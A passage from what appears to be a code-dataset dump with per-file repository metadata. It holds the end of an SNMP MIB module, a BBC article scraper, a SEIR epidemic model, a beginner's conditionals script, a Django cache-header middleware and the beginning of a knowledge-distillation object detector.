contextSwitchRate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: contextSwitchRate.setStatus('mandatory')
if mibBuilder.loadTexts: contextSwitchRate.setDescription('Process context switching rate (per second) in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the one computed the last time.')
lastUpdateOMFile = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 26), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lastUpdateOMFile.setStatus('mandatory')
if mibBuilder.loadTexts: lastUpdateOMFile.setDescription('Name of the last updated OM file.')
mibBuilder.exportSymbols("InternetThruway-MIB", cplxMateStandbyState=cplxMateStandbyState, icTimeStamp=icTimeStamp, linkAlignLinkSet=linkAlignLinkSet, nasUserUnavailableInCallRejects=nasUserUnavailableInCallRejects, phoneCallOMIndex=phoneCallOMIndex, linkOMs=linkOMs, hgIPAddress=hgIPAddress, ss7MTP2TrunkFailureAlarmTableEntry=ss7MTP2TrunkFailureAlarmTableEntry, componentIndex=componentIndex, lsIPAddress=lsIPAddress, RouteState=RouteState, ncLostServerTrap=ncLostServerTrap, LinksetState=LinksetState, nasCallOMTableEntry=nasCallOMTableEntry, trunkOccupancyPerCCS=trunkOccupancyPerCCS, routeIndex=routeIndex, destCongestPointcode=destCongestPointcode, userBusyOutCallRejects=userBusyOutCallRejects, componentTable=componentTable, routeTable=routeTable, ss7DestinationAccessible=ss7DestinationAccessible, ss7LinkCongestionAlarmTableEntry=ss7LinkCongestionAlarmTableEntry, partitionSpaceTimeStamp=partitionSpaceTimeStamp, lcKey=lcKey, nasCurrentlyActiveDigitalOutCalls=nasCurrentlyActiveDigitalOutCalls, destInaccessPointcode=destInaccessPointcode, trunkUserUnavailableOutCallRejects=trunkUserUnavailableOutCallRejects, LinkAlignmentState=LinkAlignmentState, trunkOtherOutCallRejects=trunkOtherOutCallRejects, ss7ISUPFailureAlarmTableEntry=ss7ISUPFailureAlarmTableEntry, trunkOtherInCallRejects=trunkOtherInCallRejects, lcLinkSet=lcLinkSet, lsKey=lsKey, ss7FEPCongestionWarning=ss7FEPCongestionWarning, ss7BEPCongestionWarning=ss7BEPCongestionWarning, provisionedPorts=provisionedPorts, nasUserUnavailableOutCallRejects=nasUserUnavailableOutCallRejects, phoneDialCallNormalCompletions=phoneDialCallNormalCompletions, ss7DestinationCongestedAlarm=ss7DestinationCongestedAlarm, cplxMateAvailabilityState=cplxMateAvailabilityState, totalCPUUsage=totalCPUUsage, provsionedCards=provsionedCards, compDebugStatus=compDebugStatus, provisionedNASes=provisionedNASes, trafficInCCSs=trafficInCCSs, currentlyActiveInCalls=currentlyActiveInCalls, cplxMateOperationalState=cplxMateOperationalState, nasStatusAlarm=nasStatusAlarm, nasAlarmTableEntry=nasAlarmTableEntry, PartitionSpaceStatus=PartitionSpaceStatus, linksetTableEntry=linksetTableEntry, rSATimerExpiries=rSATimerExpiries, mtp2CardId=mtp2CardId, compStateAlarm=compStateAlarm, mtp2Key=mtp2Key, ss7DestinationInaccessibleAlarmTable=ss7DestinationInaccessibleAlarmTable, nasIPAddress=nasIPAddress, inserviceNASes=inserviceNASes, linkOMTableEntry=linkOMTableEntry, nasUserBusyInCallRejects=nasUserBusyInCallRejects, lcIPAddress=lcIPAddress, hgName=hgName, phoneNumberOMs=phoneNumberOMs, linkNumSIFReceived=linkNumSIFReceived, numberOfPorts=numberOfPorts, lsName=lsName, lfCardId=lfCardId, icIndex=icIndex, provisionedDPCs=provisionedDPCs, lfIPAddress=lfIPAddress, lostServerAlarmTableEntry=lostServerAlarmTableEntry, mateServerIpAddress=mateServerIpAddress, cumulativeActiveOutCalls=cumulativeActiveOutCalls, nasCurrentlyActiveOutCalls=nasCurrentlyActiveOutCalls, nasInCallAbnormalCompletions=nasInCallAbnormalCompletions, lsFailureTimeStamp=lsFailureTimeStamp, alarmStatusInt1=alarmStatusInt1, csgComplexStateTrapClear=csgComplexStateTrapClear, partitionPercentFull=partitionPercentFull, systemCPUUsage=systemCPUUsage, destPointCode=destPointCode, destInaccessIndex=destInaccessIndex, nasTempFailInCallRejects=nasTempFailInCallRejects, destinationTable=destinationTable, destinationTableEntry=destinationTableEntry, trunkGroupCLLI=trunkGroupCLLI, nasName=nasName, TimeString=TimeString, currentlyActiveDigitalInCalls=currentlyActiveDigitalInCalls, linksetTable=linksetTable, 
cplxLocEthernetName=cplxLocEthernetName, genericWarning=genericWarning, phoneDialCallAttempts=phoneDialCallAttempts, ss7MTP2TrunkFailureAlarm=ss7MTP2TrunkFailureAlarm, compRestartKey=compRestartKey, linkAlignIPAddress=linkAlignIPAddress, nasCurrentlyActiveInCalls=nasCurrentlyActiveInCalls, linkFailures=linkFailures, ss7MTP3CongestionCritical=ss7MTP3CongestionCritical, contextSwitchRate=contextSwitchRate, nasCumulativeActiveOutCalls=nasCumulativeActiveOutCalls, compDebugKey=compDebugKey, rLCTimerExpiries=rLCTimerExpiries, routeId=routeId, userUnavailableInCallRejects=userUnavailableInCallRejects, outCallNormalCompletions=outCallNormalCompletions, linkHostname=linkHostname, nasCallOMTable=nasCallOMTable, compProvStateStatus=compProvStateStatus, phoneOtherDialCallRejects=phoneOtherDialCallRejects, cisRetrievalFailureTrapMajor=cisRetrievalFailureTrapMajor, maintenanceOMs=maintenanceOMs, trunkOutCallAttempts=trunkOutCallAttempts, phoneNumber=phoneNumber, icName=icName, ncSoftwareVersion=ncSoftwareVersion, linkIndex=linkIndex, ss7DestinationCongestedAlarmTableEntry=ss7DestinationCongestedAlarmTableEntry, ifTimeStamp=ifTimeStamp, partitionSpaceStatus=partitionSpaceStatus, linkCardDeviceName=linkCardDeviceName, maxCPUUsage=maxCPUUsage, mateServerHostName=mateServerHostName, linkNumMSUDiscarded=linkNumMSUDiscarded, inCallAbnormalCompletions=inCallAbnormalCompletions, ncServerId=ncServerId, serverCLLI=serverCLLI, inservicePorts=inservicePorts, ncEthernetName=ncEthernetName, nasMaxPortsUsed=nasMaxPortsUsed, lsTimeStamp=lsTimeStamp, ss7LinkAlignmentFailureClear=ss7LinkAlignmentFailureClear, phoneCurrentlyActiveDialCalls=phoneCurrentlyActiveDialCalls, phoneUserUnavailableDialCallRejects=phoneUserUnavailableDialCallRejects, csg=csg, ncFoundServerTrap=ncFoundServerTrap, systemOMs=systemOMs, ncClusterIP=ncClusterIP, compSecsInCurrentState=compSecsInCurrentState, abnormalReleaseInCallRejects=abnormalReleaseInCallRejects, nasCumulativeActiveInCalls=nasCumulativeActiveInCalls, ncAvailabilityState=ncAvailabilityState, inserviceCards=inserviceCards, trunkCumulativeActiveOutCalls=trunkCumulativeActiveOutCalls, linkAlignTimeStamp=linkAlignTimeStamp, hgAlarmTableEntry=hgAlarmTableEntry, trunkUserBusyInCallRejects=trunkUserBusyInCallRejects, csgComplexCLLI=csgComplexCLLI, linkAlignLinkCode=linkAlignLinkCode, destState=destState, ifIndex=ifIndex, ss7LinksetFailureAlarmTable=ss7LinksetFailureAlarmTable, uBATimerExpiries=uBATimerExpiries, ss7DestinationCongestedAlarmTable=ss7DestinationCongestedAlarmTable, alarmMaskInt1=alarmMaskInt1, lfKey=lfKey, lastUpdateOMFile=lastUpdateOMFile, linkAlignCardId=linkAlignCardId, genericNormal=genericNormal, lfLinkCode=lfLinkCode, lcTimeStamp=lcTimeStamp, nasStatusClear=nasStatusClear, currentlyActiveDigitalOutCalls=currentlyActiveDigitalOutCalls, LinkCongestionState=LinkCongestionState, nasKey=nasKey, cplxLocOperationalState=cplxLocOperationalState, linkNumMSUTransmitted=linkNumMSUTransmitted, linkCongestions=linkCongestions, ncStandbyState=ncStandbyState, ss7ISUPCongestionAlarmTable=ss7ISUPCongestionAlarmTable, nasOtherOutCallRejects=nasOtherOutCallRejects, linkInhibitionState=linkInhibitionState, genericMinor=genericMinor, hgAlarmTable=hgAlarmTable, ncOperationalState=ncOperationalState, phoneCurrentlyActiveAnalogDialCalls=phoneCurrentlyActiveAnalogDialCalls, trunkUserUnavailableInCallRejects=trunkUserUnavailableInCallRejects, UpgradeInProgress=UpgradeInProgress, alarms=alarms, compDebugTimeStamp=compDebugTimeStamp, cplxMateEthernetIP=cplxMateEthernetIP, 
trunkCallOMIndex=trunkCallOMIndex, lfName=lfName, userBusyInCallRejects=userBusyInCallRejects, linkRemoteProcOutages=linkRemoteProcOutages, trapGenericStr1=trapGenericStr1, linkAlignKey=linkAlignKey, genericCritical=genericCritical, abnormalReleaseOutCallRejects=abnormalReleaseOutCallRejects, ncServer=ncServer, compProvStateTimeStamp=compProvStateTimeStamp, ss7LinkAlignmentAlarmTableEntry=ss7LinkAlignmentAlarmTableEntry, mtp3Name=mtp3Name, destCongestKey=destCongestKey, hgStatusClear=hgStatusClear, trapName=trapName, userCPUUsage=userCPUUsage, linkOMTable=linkOMTable, ss7ISUPFailureAlarm=ss7ISUPFailureAlarm, ss7MTP3CongestionMinor=ss7MTP3CongestionMinor, partitionIndex=partitionIndex, genericMajor=genericMajor, lcLinkCode=lcLinkCode, alarmMaskInt2=alarmMaskInt2, ncStateChangeTrap=ncStateChangeTrap, ss7MTP3CongestionAlarmTable=ss7MTP3CongestionAlarmTable, remoteBusyInCCSs=remoteBusyInCCSs, csgComplexStateTrapInfo=csgComplexStateTrapInfo, aliveNASes=aliveNASes, destCongestIPAddress=destCongestIPAddress, trunkGroupOMs=trunkGroupOMs, otherOutCallRejects=otherOutCallRejects, lsFailurePointcode=lsFailurePointcode, trapFileName=trapFileName, ss7LinkAlignmentAlarmTable=ss7LinkAlignmentAlarmTable, destIndex=destIndex, destCongestName=destCongestName, nasCurrentlyInUsePorts=nasCurrentlyInUsePorts, systemCallRate=systemCallRate, mtp2TimeStamp=mtp2TimeStamp, linkNumUnexpectedMsgs=linkNumUnexpectedMsgs, trapCompName=trapCompName, linkNumSIFTransmitted=linkNumSIFTransmitted, ncEthernetIP=ncEthernetIP, nortel=nortel, tempFailOutCallRejects=tempFailOutCallRejects, inserviceCircuits=inserviceCircuits, destInaccessIPAddress=destInaccessIPAddress, linksetState=linksetState, cplxLocAvailabilityState=cplxLocAvailabilityState, nasOutCallAbnormalCompletions=nasOutCallAbnormalCompletions, ss7LinkFailureAlarmTable=ss7LinkFailureAlarmTable, ss7LinkCongestionAlarm=ss7LinkCongestionAlarm, restartStateClear=restartStateClear, alarmStatusInt2=alarmStatusInt2, trunkCurrentlyActiveDigitalInCalls=trunkCurrentlyActiveDigitalInCalls, ss7ISUPCongestionClear=ss7ISUPCongestionClear, lfIndex=lfIndex, linkTableEntry=linkTableEntry, mtp2Name=mtp2Name, mtp3IPAddress=mtp3IPAddress, ncUpgradeInProgress=ncUpgradeInProgress, nasOutCallAttempts=nasOutCallAttempts, lfLinkSet=lfLinkSet, provisionedCircuits=provisionedCircuits, partitionTable=partitionTable, ss7LinkCongestionAlarmTable=ss7LinkCongestionAlarmTable, serverMemSize=serverMemSize, ss7LinkFailureClear=ss7LinkFailureClear, trunkInCallAttempts=trunkInCallAttempts, mtp2Index=mtp2Index, trapIdKey=trapIdKey, phoneCallOMTableEntry=phoneCallOMTableEntry, ss7LinksetFailureAlarm=ss7LinksetFailureAlarm)
mibBuilder.exportSymbols("InternetThruway-MIB", icIPAddress=icIPAddress, trunkCumulativeActiveInCalls=trunkCumulativeActiveInCalls, lfTimeStamp=lfTimeStamp, ss7LinkFailureAlarm=ss7LinkFailureAlarm, partitionMegsFree=partitionMegsFree, compStateClear=compStateClear, lsFailureIndex=lsFailureIndex, cumulativeActiveInCalls=cumulativeActiveInCalls, ss7LinksetFailureClear=ss7LinksetFailureClear, linksetId=linksetId, linkOMSetId=linkOMSetId, hgKey=hgKey, csgComplexStateTrapCritical=csgComplexStateTrapCritical, linkNumMSUReceived=linkNumMSUReceived, ss7LinksetFailureAlarmTableEntry=ss7LinksetFailureAlarmTableEntry, partitionName=partitionName, icKey=icKey, ss7MTP3CongestionMajor=ss7MTP3CongestionMajor, icCongestionLevel=icCongestionLevel, trunkCurrentlyActiveOutCalls=trunkCurrentlyActiveOutCalls, avgLoad=avgLoad, compDebugOff=compDebugOff, nasCurrentlyActiveDigitalInCalls=nasCurrentlyActiveDigitalInCalls, destCongestIndex=destCongestIndex, restartStateAlarm=restartStateAlarm, trunkInCallAbnormalCompletions=trunkInCallAbnormalCompletions, trunkAbnormalReleaseInCallRejects=trunkAbnormalReleaseInCallRejects, linksetIndex=linksetIndex, mtp2IPAddress=mtp2IPAddress, ifIPAddress=ifIPAddress, lsFailureName=lsFailureName, nasAlarmTimeStamp=nasAlarmTimeStamp, trafficInCCSIncomings=trafficInCCSIncomings, nasTempFailOutCallRejects=nasTempFailOutCallRejects, routeState=routeState, DestinationState=DestinationState, linkInhibits=linkInhibits, compRestartTimeStamp=compRestartTimeStamp, ss7MTP3CongestionClear=ss7MTP3CongestionClear, nasInCallNormalCompletions=nasInCallNormalCompletions, MTP2AlarmConditionType=MTP2AlarmConditionType, linkId=linkId, ss7ISUPFailureClear=ss7ISUPFailureClear, componentName=componentName, lcCardId=lcCardId, nasOMs=nasOMs, disk=disk, nasIndex=nasIndex, trunkCurrentlyActiveAnalogOutCalls=trunkCurrentlyActiveAnalogOutCalls, ncClusterName=ncClusterName, trunkCurrentlyActiveDigitalOutCalls=trunkCurrentlyActiveDigitalOutCalls, routeDestPointCode=routeDestPointCode, LinkState=LinkState, nasAlarmTable=nasAlarmTable, destCongestTimeStamp=destCongestTimeStamp, cplxAlarmStatus=cplxAlarmStatus, lsIndex=lsIndex, ss7=ss7, nasAbnormalReleaseOutCallRejects=nasAbnormalReleaseOutCallRejects, currentlyActiveOutCalls=currentlyActiveOutCalls, ComponentIndex=ComponentIndex, hgIndex=hgIndex, lostServerAlarmTable=lostServerAlarmTable, localBusyInCCSs=localBusyInCCSs, currentlyActiveAnalogOutCalls=currentlyActiveAnalogOutCalls, ss7LinkCongestionClear=ss7LinkCongestionClear, ss7DestinationCongestedClear=ss7DestinationCongestedClear, mtp3CongestionLevel=mtp3CongestionLevel, callOMs=callOMs, tempFailInCallRejects=tempFailInCallRejects, lcIndex=lcIndex, trunkOutCallAbnormalCompletions=trunkOutCallAbnormalCompletions, phoneUserBusyDialCallRejects=phoneUserBusyDialCallRejects, ss7ISUPCongestionAlarm=ss7ISUPCongestionAlarm, linkAlignIndex=linkAlignIndex, inCallNormalCompletions=inCallNormalCompletions, ifName=ifName, currentlyActiveAnalogInCalls=currentlyActiveAnalogInCalls, routeRank=routeRank, phoneDialCallAbnormalCompletions=phoneDialCallAbnormalCompletions, phoneTempFailDialCallRejects=phoneTempFailDialCallRejects, otherInCallRejects=otherInCallRejects, routeTableEntry=routeTableEntry, trapDate=trapDate, userUnavailableOutCallRejects=userUnavailableOutCallRejects, trapIPAddress=trapIPAddress, cplxMateEthernetName=cplxMateEthernetName, phoneCallOMTable=phoneCallOMTable, serverIpAddress=serverIpAddress, trunkTempFailOutCallRejects=trunkTempFailOutCallRejects, compRestartStatus=compRestartStatus, 
nasOutCallNormalCompletions=nasOutCallNormalCompletions, ss7DestinationInaccessible=ss7DestinationInaccessible, bLATimerExpiries=bLATimerExpiries, trunkAllActiveCalls=trunkAllActiveCalls, destInaccessName=destInaccessName, system=system, nasOtherInCallRejects=nasOtherInCallRejects, cplxName=cplxName, trunkUserBusyOutCallRejects=trunkUserBusyOutCallRejects, nasInCallAttempts=nasInCallAttempts, lcName=lcName, nasCurrentlyActiveAnalogOutCalls=nasCurrentlyActiveAnalogOutCalls, dialaccess=dialaccess, trapTimeStamp=trapTimeStamp, trunkCurrentlyActiveInCalls=trunkCurrentlyActiveInCalls, linkNumAutoChangeovers=linkNumAutoChangeovers, diskSpaceClear=diskSpaceClear, omData=omData, linkAlignName=linkAlignName, nasName1=nasName1, ss7LinkFailureAlarmTableEntry=ss7LinkFailureAlarmTableEntry, etherCardTrapMajor=etherCardTrapMajor, LinkInhibitionState=LinkInhibitionState, components=components, linkCongestionState=linkCongestionState, ss7MTP3CongestionAlarmTableEntry=ss7MTP3CongestionAlarmTableEntry, destInaccessKey=destInaccessKey, trunkCallOMTable=trunkCallOMTable, alarmStatusInt3=alarmStatusInt3, ss7ISUPCongestionAlarmTableEntry=ss7ISUPCongestionAlarmTableEntry, ifKey=ifKey, serverHostName=serverHostName, compProvStateKey=compProvStateKey, nasMinPortsUsed=nasMinPortsUsed, etherCardTrapCritical=etherCardTrapCritical, ComponentSysmanState=ComponentSysmanState, trunkCurrentlyActiveAnalogInCalls=trunkCurrentlyActiveAnalogInCalls, nasAbnormalReleaseInCallRejects=nasAbnormalReleaseInCallRejects, ss7ISUPFailureAlarmTable=ss7ISUPFailureAlarmTable, mtp2AlarmCondition=mtp2AlarmCondition, trunkOutCallNormalCompletions=trunkOutCallNormalCompletions, etherCardTrapClear=etherCardTrapClear, linkTransmittedMSUs=linkTransmittedMSUs, cplxLocEthernetIP=cplxLocEthernetIP, traps=traps, ncServerName=ncServerName, phoneCumulativeActiveDialCalls=phoneCumulativeActiveDialCalls, partitionTableEntry=partitionTableEntry, linkOMId=linkOMId, csgComplexStateTrapMajor=csgComplexStateTrapMajor, ncHostName=ncHostName, numberOfCircuits=numberOfCircuits, linkTable=linkTable, ss7MTP2TrunkFailureAlarmTable=ss7MTP2TrunkFailureAlarmTable, trunkInCallNormalCompletions=trunkInCallNormalCompletions, linkAlignmentState=linkAlignmentState, outCallAbnormalCompletions=outCallAbnormalCompletions, nasCallOMIndex=nasCallOMIndex, phoneAbnormalReleaseDialCallRejects=phoneAbnormalReleaseDialCallRejects, destRuleId=destRuleId, nasCmplxName=nasCmplxName, lsFailureIPAddress=lsFailureIPAddress, partitionSpaceKey=partitionSpaceKey, ss7DestinationInaccessibleAlarmTableEntry=ss7DestinationInaccessibleAlarmTableEntry, hgStatusAlarm=hgStatusAlarm, inCallAttempts=inCallAttempts, linkState=linkState, ss7MTP2TrunkFailureClear=ss7MTP2TrunkFailureClear, nasAllActiveCalls=nasAllActiveCalls, compDebugOn=compDebugOn, destCongestCongestionLevel=destCongestCongestionLevel, mtp3Key=mtp3Key, linkReceivedMSUs=linkReceivedMSUs, ss7LinkAlignmentFailureAlarm=ss7LinkAlignmentFailureAlarm, linksetAdjPointcode=linksetAdjPointcode, routeLinksetId=routeLinksetId, phoneCurrentlyActiveDigitalDialCalls=phoneCurrentlyActiveDigitalDialCalls, nasCurrentlyActiveAnalogInCalls=nasCurrentlyActiveAnalogInCalls, trunkTempFailInCallRejects=trunkTempFailInCallRejects, trunkCallOMTableEntry=trunkCallOMTableEntry, diskSpaceAlarm=diskSpaceAlarm, mtp3Index=mtp3Index, nasUserBusyOutCallRejects=nasUserBusyOutCallRejects, lsFailureKey=lsFailureKey, hgAlarmTimeStamp=hgAlarmTimeStamp, mtp3TimeStamp=mtp3TimeStamp, componentTableEntry=componentTableEntry, outCallAttempts=outCallAttempts, 
cplxLocStandbyState=cplxLocStandbyState, trunkAbnormalReleaseOutCallRejects=trunkAbnormalReleaseOutCallRejects, destInaccessTimeStamp=destInaccessTimeStamp)
| 127.231942 | 9,703 | 0.781809 | 2,594 | 0.016363 | 0 | 0 | 0 | 0 | 0 | 0 | 49,652 | 0.313201 |
b9f67833672023bef782862284907976acb9371f | 2,216 | py | Python | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | 1 | 2021-12-27T12:57:07.000Z | 2021-12-27T12:57:07.000Z | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | null | null | null | newsparser.py | antoreep-jana/BBC-News-Analyzer | 0a6e54ddf4baefa4532213c5e6f60e712ff3a1ca | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup as bs
import requests
class BBC:
def __init__(self, url:str):
article = requests.get(url)
self.soup = bs(article.content, "html.parser")
#print(dir(self.soup))
#print(self.soup.h1.text)
self.body = self.get_body()
self.link = url
self.title = self.get_title()
self.author = self.get_author()
self.images = self.get_images()
self.date = self.get_date()
#author = self.soup.find
#date = self.soup
#for img in imgs:
# print(img['src'])
paras = self.soup.find_all('div', {"class" : "ssrcss-17j9f6r-RichTextContainer e5tfeyi1"})
#for para in paras:
# print(para.text)
def get_body(self) -> list:
#body = self.soup.find(property="articleBody")
paras = self.soup.find_all('div', {"class" : "ssrcss-17j9f6r-RichTextContainer e5tfeyi1"})
#for para in paras:
# print(para.text)
return [p.text for p in paras]
#return [p.text for p in body.find_all("p")]
def get_title(self) -> str:
#return self.soup.find(class_="story-body__h1").text
return self.soup.h1.text
def get_author(self) -> str:
        author = self.soup.find('p', {'class' : 'ssrcss-1rv0moy-Contributor e5xb54n2'})
        # Some articles carry no byline element; return an empty string instead of raising
        return author.text.replace("BBC News", "") if author else ""
def get_images(self) -> list:
imgs = self.soup.find_all('figure', {'class' : 'ssrcss-wpgbih-StyledFigure e34k3c23'})
imgs_lst = []
for img in imgs:
try:
if "blank_white_space" not in img.img['src']:
imgs_lst.append(img.img['src'])#['div']['span']['span']['img'])
except:
pass
return imgs_lst
def get_date(self) -> str:
date = self.soup.find_all('time')[0]
return date['datetime']
parsed = BBC("https://www.bbc.co.uk/news/world-europe-49345912")
#print(parsed.title)
#print(parsed.link)
#print(parsed.author)
#print(parsed.date)
#print(parsed.title)
#print(parsed.body)
#print(parsed.images)
#print(parsed.body)
| 28.410256 | 98 | 0.564982 | 1,921 | 0.866877 | 0 | 0 | 0 | 0 | 0 | 0 | 859 | 0.387635 |
b9f73f41171ea9b93f4f79bc336c9fe6927dba89 | 2,044 | py | Python | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | SIR_model-Copy.Caroline.1.py | Caroline-Odevall/final-project-team-18 | fbf00ae4ec554dee9245a9834ff4108b3d339842 | [
"MIT"
] | null | null | null | # In[42]:
from scipy.integrate import odeint
import numpy as np
import matplotlib.pyplot as plt
# In[43]:
# describe the model
def deriv(y, t, N, beta, gamma, delta):
S, E, I, R = y
    dSdt = -beta * S * I / N # S(t) - susceptible (those who can still catch the infection)
    dEdt = beta * S * I / N - delta * E # E(t) - exposed (infected but not yet infectious); they progress to I at rate delta
    dIdt = delta * E - gamma * I # I(t) - infected (those with an ongoing infection)
dRdt = gamma * I
return dSdt, dEdt, dIdt, dRdt
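# For reference, deriv() above implements the standard textbook SEIR system
# (with delta = 1/incubation period and gamma = 1/infectious period):
#   dS/dt = -beta * S * I / N
#   dE/dt =  beta * S * I / N - delta * E
#   dI/dt =  delta * E - gamma * I
#   dR/dt =  gamma * I
# The four right-hand sides sum to zero, so S + E + I + R = N is conserved.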
# In[44]:
# describe the parameters
N = 2283 # Total population, N = S(t) + E(t) + I(t) + R(t)
D = 4.0 #infections last four days
gamma = 1.0 / D # Removal rate (how many recover per unit time)
delta = 1.0 / 5.0 #incubation period of five days
R_0 = 2.5 # Basic reproduction number
beta = R_0 * gamma # R_0 = beta/gamma; the number of people each infected person infects per unit time (depends on the properties of the virus and on how we behave)
S0, E0, I0, R0 = N-1, 1, 0, 0 # initial conditions: one exposed, rest susceptible
# Rt = R0 * S(t)/Ntot * (1 - b), where b = the effect of policy and behavioural changes
# In[45]:
t = np.linspace(0, 99, 100) # Grid of time points (in days)
y0 = S0, E0, I0, R0 # Initial conditions vector
# Integrate the SIR equations over the time grid, t.
ret = odeint(deriv, y0, t, args=(N, beta, gamma, delta))
S, E, I, R = ret.T
# In[46]:
def plotsir(t, S, E, I, R):
f, ax = plt.subplots(1,1,figsize=(10,4))
ax.plot(t, S, 'b', alpha=0.7, linewidth=2, label='Susceptible')
ax.plot(t, E, 'y', alpha=0.7, linewidth=2, label='Exposed')
ax.plot(t, I, 'r', alpha=0.7, linewidth=2, label='Infected')
ax.plot(t, R, 'g', alpha=0.7, linewidth=2, label='Recovered')
ax.set_xlabel('Time (days)')
ax.yaxis.set_tick_params(length=0)
ax.xaxis.set_tick_params(length=0)
ax.grid(b=True, which='major', c='w', lw=2, ls='-')
legend = ax.legend()
legend.get_frame().set_alpha(0.5)
for spine in ('top', 'right', 'bottom', 'left'):
ax.spines[spine].set_visible(False)
plt.savefig('Plot.png')
plt.show();
# plot the graph
# In[47]:
plotsir(t, S, E, I, R)
# In[ ]:
| 24.333333 | 137 | 0.630137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 879 | 0.427114 |
b9f778c162a3f42e748bada544f1b060ab9f29ed | 466 | py | Python | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | 1 | 2018-03-07T05:26:12.000Z | 2018-03-07T05:26:12.000Z | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | null | null | null | Condicionales anidados.py | gcardosov/PythonAprendeOrg | 0cad81f0a584c98389ca729a337d30581780e520 | [
"MIT"
] | null | null | null | pregunta = input('trabajas desde casa? ')
if pregunta == True:
print 'Eres afortunado'
if pregunta == False:
print 'Trabajas fuera de casa'
tiempo = input('Cuantos minutos haces al trabajo: ')
if tiempo == 0:
print 'trabajas desde casa'
elif tiempo <=20:
print 'Es poco tiempo'
elif tiempo >= 21 and tiempo <=45:
print 'Es un tiempo razonable'
else:
print 'Busca otras rutas'
| 20.26087 | 57 | 0.583691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 180 | 0.386266 |
b9f8215f5040fa71b2646d52a053545a92c3fd12 | 1,681 | py | Python | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 9 | 2020-08-17T11:01:48.000Z | 2022-01-17T22:24:13.000Z | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 100 | 2020-08-14T05:56:40.000Z | 2022-03-01T22:39:58.000Z | app/middleware/cache_headers.py | Niclnx/service-stac | ad9129a7130d09b2bed387d8e82575eb86fdfa7b | [
"BSD-3-Clause"
] | 3 | 2020-09-02T14:01:07.000Z | 2021-07-27T06:30:26.000Z | import logging
import re
from urllib.parse import urlparse
from django.conf import settings
from django.utils.cache import add_never_cache_headers
from django.utils.cache import patch_cache_control
from django.utils.cache import patch_response_headers
logger = logging.getLogger(__name__)
STAC_BASE = settings.STAC_BASE
STAC_BASE_V = settings.STAC_BASE_V
class CacheHeadersMiddleware:
'''Middleware that adds appropriate cache headers to GET and HEAD methods.
NOTE: /checker, /get-token, /metrics and /{healthcheck} endpoints are marked as never cache.
'''
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
# Code to be executed for each request before
# the view (and later middleware) are called.
response = self.get_response(request)
# Code to be executed for each request/response after
# the view is called.
# match /xxx or /api/stac/xxx
# f.ex. /metrics, /checker, /api/stac/{healthcheck}, /api/stac/get-token
if re.match(fr'^(/{STAC_BASE})?/\w+$', request.path):
add_never_cache_headers(response)
elif (
request.method in ('GET', 'HEAD') and
not request.path.startswith(urlparse(settings.STATIC_URL).path)
):
logger.debug(
"Patching cache headers for request %s %s",
request.method,
request.path,
extra={"request": request}
)
patch_response_headers(response, settings.CACHE_MIDDLEWARE_SECONDS)
patch_cache_control(response, public=True)
return response
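# Minimal usage sketch (illustrative only): a middleware class like this is
# enabled by adding its dotted path to the MIDDLEWARE list in the Django
# settings module. The exact dotted path below is an assumption based on this
# file living at app/middleware/cache_headers.py.
#
# MIDDLEWARE = [
#     ...,
#     'middleware.cache_headers.CacheHeadersMiddleware',
#     ...,
# ]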
| 32.960784 | 96 | 0.662701 | 1,320 | 0.785247 | 0 | 0 | 0 | 0 | 0 | 0 | 532 | 0.316478 |
b9f87264f50f9243a592053fcbe97aca0b8c2377 | 2,818 | py | Python | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | 5 | 2019-06-11T11:08:54.000Z | 2021-03-25T10:06:01.000Z | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | null | null | null | mmdet/models/detectors/knowledge_distilling/kd_single_stage.py | anorthman/mmdetection | 52e28154364f0e19d11c206bb357d88f29fc4a2d | [
"Apache-2.0"
] | 1 | 2019-06-11T11:08:55.000Z | 2019-06-11T11:08:55.000Z | # author huangchuanhong
import torch
from mmcv.runner import load_checkpoint
from ..base import BaseDetector
from ..single_stage import SingleStageDetector
from ...registry import DETECTORS
from ...builder import build_detector
@DETECTORS.register_module
class KDSingleStageDetector(SingleStageDetector):
def __init__(self,
backbone,
teacher,
neck=None,
bbox_head=None,
train_cfg=None,
test_cfg=None,
pretrained=None):
super(KDSingleStageDetector, self).__init__(backbone,
neck=neck,
bbox_head=bbox_head,
train_cfg=train_cfg,
test_cfg=test_cfg,
pretrained=pretrained)
self.teacher_detector = build_detector(teacher.model, train_cfg=None, test_cfg=test_cfg)
load_checkpoint(self.teacher_detector, teacher.checkpoint)
self.teacher_detector.eval()
self.beta = train_cfg.teacher.beta
def forward_train(self,
img,
img_metas,
gt_bboxes,
gt_labels,
gt_bboxes_ignore=None,
beta=1000.):
feats = ()
backbone_feats = self.backbone(img)
if self.train_cfg.teacher.backbone_at:
